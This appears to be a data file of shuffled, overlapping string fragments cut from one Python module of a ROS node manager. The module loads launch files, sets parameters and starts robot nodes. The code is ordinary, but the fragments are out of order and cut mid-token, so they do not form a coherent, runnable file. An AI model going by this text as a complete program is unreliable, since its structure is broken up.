"'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts try:",
"cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required",
"= entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass # get the sensor description",
"in exclude list, skip autostart\", n.name) return # env = n.env_args prefix =",
"n.namespace, '__name:=%s' % n.name] if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) #",
"@return: the absolute path of the launch file @rtype: C{str} @raise LoadException: if",
"for the ROS service to start a node. ''' self.runNode(req.node) return [] def",
"launchfile info local namespace sys.argv = list(argv) # set the global environment to",
"distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return",
"the global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg,",
"package is given, try first to find the launch file in the given",
"not self.parameter_loaded: self.loadParams() n = None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace,",
"= roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple nodes, invalid package raise",
"pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): ''' Returns",
"args # print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s",
"SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import",
"'' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s`",
"will be created on each load of a launch file to inform the",
"for machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if",
"while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if",
"def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto the parameter server \"\"\"",
"[ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args",
"% (remap[0], remap[1])) # masteruri = self.masteruri # if n.machine_name and not n.machine_name",
"not self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as",
"AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR",
"the name of nodes with namespace self.sensors = {} # sensor descriptions launch_path",
"rosgraph.names import roslib.names import roslib.network import rospy import shlex import std_srvs.srv import subprocess",
"roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) #",
"env-loader support? # if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd =",
"'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns",
"# if the parameter group parameter found, assign node to the group if",
"> 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' %",
"DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the list with names of nodes",
"param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code, msg, _ in r: if",
"as system default @type val: str @return: the decoded string @rtype: C{unicode} or",
"[str]))))} ''' result = dict() capabilies_descr = dict() if self.roscfg is not None:",
"copyright notice, this list of conditions and the following # disclaimer in the",
"# # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All rights reserved. #",
"result = [] for a in argv: in_filter = False for f in",
"C{str} @raise StartException: if an error occurred while start. ''' if not self.parameter_loaded:",
"%s\" % self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv)",
"= roslib.names.SEP # if the 'capability_group' parameter found, assign node to the group",
"the ROS service to get the list with available nodes. ''' return ListNodesResponse(self.nodes)",
"', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str('",
"% (filename, pkg)) return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try:",
"ROS distribution API. @return: ROS master URI @rtype: C{str} ''' try: import rospkg.distro",
"TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR",
"one will be tacked. @param path: the file name of the launch file",
"if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer",
"and os.path.exists(launch_file): return launch_file raise LoadException('File %s in package [%s] not found!' %",
"group parameter in namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1:",
"if not added: ns = cap_ns # add new group in the namespace",
"xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this as it causes too much",
"in source and binary forms, with or without # modification, are permitted provided",
"self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\"",
"not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? #",
"description list first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list):",
"rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" %",
"r = param_server_multi() for code, msg, _ in r: if code != 1:",
"# clear specified parameter namespaces # #2468 unify clear params to prevent error",
"entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass # get the",
"pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter",
"= '' for param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if",
"'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass",
"or in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.): ''' Load the launch",
"!= 1: # raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects are",
"def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic =",
"self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart",
"path, package=''): ''' Searches for a launch file. If package is given, try",
"into ROS parameter server. ''' params = dict() for param, value in self.roscfg.params.items():",
"THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE",
"if ':=' not in a or in_filter: continue result.append(a) return result def load(self,",
"= dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr = ''",
"multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # ,",
"the group if not cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group' parameter",
"''' # try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: # self.__lock.release()",
"xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468 unify clear",
"!= self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg,",
"the given launch file. ''' pass class StartException(Exception): ''' The exception throwing while",
"first one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File",
"'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime']",
"def __init__(self): self.nodes = [] '''@ivar: the list with names of nodes with",
"except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return",
"tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine):",
"param_server_multi() for code, msg, _ in r: if code != 1: raise StartException(\"Failed",
"'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value)",
"avoid load the launchfile info local namespace sys.argv = list(argv) # set the",
"rosservice_description(self, req): ''' Returns the current description. ''' return self.description_response def loadParams(self): '''",
"rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list with node",
"thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts try: self._pending_starts.remove(node) except:",
"if not start_now: # Start the timer for waiting for the topic start_timer",
"= ListDescriptionResponse() # variables to print the pending autostart nodes self._pending_starts = set()",
"# wait for process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start()",
"result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay']",
"for k, v in n.env_args: new_env[k] = v # the ROS_NAMESPACE environment is",
"in self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if",
"pass return result def getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities} and",
"# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS",
"name of the launch file @type path: C{str} @param package: the package containing",
"as tupel of (type, name, text) ''' self.package = '' self.file = ''",
"group_dict in ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability()",
"for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start()",
"IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO,",
"skip autostart\", n.name) return # env = n.env_args prefix = n.launch_prefix if n.launch_prefix",
"cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found,",
"import types string_types = types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types): cmd",
"as e: raise StartException(str(e)) # handle different result types str or array of",
"== 'localhost' else '' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns =",
"{} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path)",
"parameter found, assign node to the group if not cap_ns: cap_ns = roslib.names.SEP",
"clear_params): \"\"\" Load parameters onto the parameter server \"\"\" try: import xmlrpclib except",
"and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in exclude list, skip autostart\",",
"= '' dr.robot_descr = '' for param, p in self.roscfg.params.items(): if param.endswith('robots'): if",
"self.__lock = threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" %",
"dict() capabilies_descr = dict() if self.roscfg is not None: # get the capabilities",
"initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload)",
"path, Default: the package of the node cwd = self.get_ros_home() if not (n.cwd",
"# modification, are permitted provided that the following conditions # are met: #",
"configuration. @param node: the name of the node @type node: C{str} @raise StartException:",
"= threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now and autostart",
"namespace from sys.argv to avoid load the launchfile info local namespace sys.argv =",
"StartException(\"Failed to set parameter: %s\" % (msg)) except Exception: raise # re-raise as",
"node @type node: C{str} @raise StartException: if an error occurred while start. '''",
"except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for a launch",
"isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG format, expected:",
"load of a launch file to inform the caller about a new configuration.",
"capability group parameter in namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) >",
"WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING",
"the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine",
"types string_types = types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types): cmd =",
"separate loops, to create the description list first for param, p in self.roscfg.params.items():",
"# Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package =",
"traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n,",
"let the node_manager to update the view if delay_service_creation > 0.: t =",
"@return: ROS HOME path @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename()",
"SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__",
"ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for",
"if the 'capability_group' parameter found, assign node to the group if cap_param in",
"found!' % (path, package)) def rosservice_list_nodes(self, req): ''' Callback for the ROS service",
"LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)",
"self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar:",
"# set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] >",
"description), ...])}''' self.robot_descr = ('', '', '') '''@ivar: robot description as tupel of",
"expected: ['name', 'type', 'images', 'description'] -> ignore\", param) else: for entry in p.value:",
"nodes with namespace self.sensors = {} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package)",
"def _get_node(self, pkg, filename): cmd = None try: cmd = roslib.packages.find_node(pkg, filename) except",
"rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self, node): result",
"must reproduce the above # copyright notice, this list of conditions and the",
"found, assign node to the group if not cap_ns: cap_ns = roslib.names.SEP #",
"n.name), autostart) if len(cmd) > 1: raise StartException('Multiple executables are found! The first",
"self.timed_service_creation, True) # if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic",
"following # disclaimer in the documentation and/or other materials provided # with the",
"self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart:",
"is None: raise StartException(\"Node '%s' not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace,",
"# get the capability nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name)",
"AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL",
"'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group",
"specified parameter namespaces # #2468 unify clear params to prevent error for p",
"# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED",
"its # contributors may be used to endorse or promote products derived #",
"result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): ''' Returns the ROS",
"OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON",
"else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response = dr = ListDescriptionResponse()",
"self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True)",
"self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=',",
"as e: rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart = False def",
"@rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric',",
"rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node): param_name",
"cap.name = group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes",
"in the given package if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) >",
"be used to endorse or promote products derived # from this software without",
"path: C{str} @param package: the package containing the launch file or an empty",
"# determine the current working path, Default: the package of the node cwd",
"import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network",
"launch file. ''' pass class StartException(Exception): ''' The exception throwing while run a",
"_get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value",
"names of its # contributors may be used to endorse or promote products",
"start a node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return []",
"['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self):",
"n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if",
"code != 1: # raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects",
"with self.__lock: self._pending_starts.clear() # shutdown the services to inform the caller about a",
"params to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi()",
"= v # the ROS_NAMESPACE environment is used in cpp plugins in rqt",
"prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args #",
"HACK to let the node_manager to update the view if delay_service_creation > 0.:",
"if ns not in result[machine_name]: result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]:",
"n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri # if n.machine_name and",
"False) # initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload',",
"autostart and start_required: start_now = False # get published topics from ROS master",
"not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add remaps for remap in",
"current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\",",
"''' Parses the launch file for C{capabilities} and C{capability_group} parameter and creates dictionary",
"''' pass class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the list with",
"distribution API. @return: ROS HOME path @rtype: C{str} ''' try: import rospkg.distro distro",
"are met: # # * Redistributions of source code must retain the above",
"return result def load(self, delay_service_creation=0.): ''' Load the launch file configuration ''' with",
"respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args)",
"new_env[k] except: pass # add node environment parameter for k, v in n.env_args:",
"nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the ROS service",
"C{unicode} or original on error ''' result = val.replace(\"\\\\n \", \"\\n\") try: result",
"from roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names import roslib.names",
"WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND",
"CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR",
"True break if ':=' not in a or in_filter: continue result.append(a) return result",
"!= 5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] ->",
"while start. ''' if not self.parameter_loaded: self.loadParams() n = None for item in",
"= set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result =",
"# ''' # try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: #",
"= args # print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node",
"nodes. @return: the capabilities description stored in this configuration @rtype: C{dict(machine : dict(namespace:",
"first one will be tacked. @param path: the file name of the launch",
"about a new configuration. ''' self.description_response = ListDescriptionResponse() # variables to print the",
"launch file for C{capabilities} and C{capability_group} parameter and creates dictionary for grouping the",
"autostart and start_delay > 0: start_now = False # start timer for delayed",
"launch file in the given package if package: paths = roslib.packages.find_resource(package, launch_file) if",
"node: C{str} @raise StartException: if an error occurred while start. ''' if not",
"not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns:",
"service will be created on each load of a launch file to inform",
"system default @type val: str @return: the decoded string @rtype: C{unicode} or original",
"absolute path @type package: C{str} @return: the absolute path of the launch file",
"(filename, pkg)) return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return",
"item.name)) # get the robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name =",
"package=''): ''' Searches for a launch file. If package is given, try first",
"= [] '''@ivar: the list with names of nodes with name spaces.''' self.sensors",
"%s\", n, e) self.do_autostart = False def _decode(self, val): ''' Replaces the '\\\\n'",
"services # HACK to let the node_manager to update the view if delay_service_creation",
"is not None: # get the capabilities description # use two separate loops,",
"machine_name not in result: result[machine_name] = dict() for (ns, groups) in result[machine_name].items(): if",
"respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if",
"None or len(cmd) == 0: raise StartException('%s in package [%s] not found!' %",
"prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for",
"self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if",
"roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto the parameter",
"materials provided # with the distribution. # * Neither the name of Fraunhofer",
"description as tupel of (type, name, text) ''' self.package = '' self.file =",
"= None '''@ivar: The service will be created on each load of a",
"or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group, descr_dict in group_dict.items(): if",
"result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result",
"launch file or an empty string, if the C{file} is an absolute path",
"rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\"",
"file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv",
"else: for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])}",
"machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args: # env[len(env):] =",
"description stored in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description'",
"namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP)",
"nodes, invalid package raise StartException(str(e)) except Exception as e: raise StartException(str(e)) # handle",
"the name of the node @type node: C{str} @raise StartException: if an error",
"# Start the timer for waiting for the topic start_timer = threading.Timer(3., self._run_node,",
"is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService =",
"self.__lock.release() # return [] def rosservice_description(self, req): ''' Returns the current description. '''",
"= '' dr.robot_type = '' dr.robot_descr = '' for param, p in self.roscfg.params.items():",
"respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix,",
"__future__ import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task,",
"= '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic",
"= rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max']",
"FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #",
"The first one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env,",
"variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max']))",
"{'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '',",
"list(argv) # set the global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used',",
"shutdown the services to inform the caller about a new configuration. if self.runService",
"rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) #",
"API. @return: ROS HOME path @rtype: C{str} ''' try: import rospkg.distro distro =",
"args.append('__cwd:=%s' % n.cwd) # add remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0],",
"req.argv) # finally: # self.__lock.release() # return [] def rosservice_description(self, req): ''' Returns",
"the names of its # contributors may be used to endorse or promote",
"topic) except: pass return topic def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime':",
"is not None else '' args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name]",
"n.launch_prefix if n.launch_prefix is not None else '' args = ['__ns:=%s' % n.namespace,",
"@type path: C{str} @param package: the package containing the launch file or an",
"this list of conditions and the following # disclaimer in the documentation and/or",
"the capability group parameter in namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP)",
"rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback # print traceback.format_exc() if self.do_autostart:",
"as e: # multiple nodes, invalid package raise StartException(str(e)) except Exception as e:",
"assign node to the group if not cap_ns: cap_ns = roslib.names.SEP # if",
"rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self, req): # ''' # Load",
"# Redistribution and use in source and binary forms, with or without #",
"= node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args popen_cmd =",
"# Load the launch file # ''' # try: # self.__lock.acquire() # self.load(req.package,",
"nor the names of its # contributors may be used to endorse or",
"given package. If more then one launch file with the same name found",
"dict() for param, value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params))",
"float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic",
"Default: the package of the node cwd = self.get_ros_home() if not (n.cwd is",
"and autostart and start_delay > 0: start_now = False # start timer for",
"node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from environment new_env =",
"not in a or in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.): '''",
"(ns, groups) in result[machine_name].items(): if ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname)",
"self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response = dr",
"self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start %s: %s\", n, e)",
"start %s: %s\", n, e) self.do_autostart = False def _decode(self, val): ''' Replaces",
"of source code must retain the above copyright # notice, this list of",
"= Capability() cap.namespace = ns cap.name = group cap.type = descr_dict['type'] cap.images =",
"node: n = item break if n is None: raise StartException(\"Node '%s' not",
"with node names for item in self.roscfg.nodes: if item.machine_name and not item.machine_name ==",
"a or in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.): ''' Load the",
"names of nodes with name spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node",
"self.__lock: self._pending_starts.clear() # shutdown the services to inform the caller about a new",
"# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A",
"parameter and creates dictionary for grouping the nodes. @return: the capabilities description stored",
"# nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the current working path, Default:",
"self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) # remove namespace",
"file to inform the caller about a new configuration. ''' self.listService = None",
"promote products derived # from this software without specific prior written permission. #",
"USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH",
"@type package: C{str} @return: the absolute path of the launch file @rtype: C{str}",
"descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name =",
"''' Callback for the ROS service to start a node. ''' self.runNode(req.node) return",
"result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): ''' Parses the launch file for",
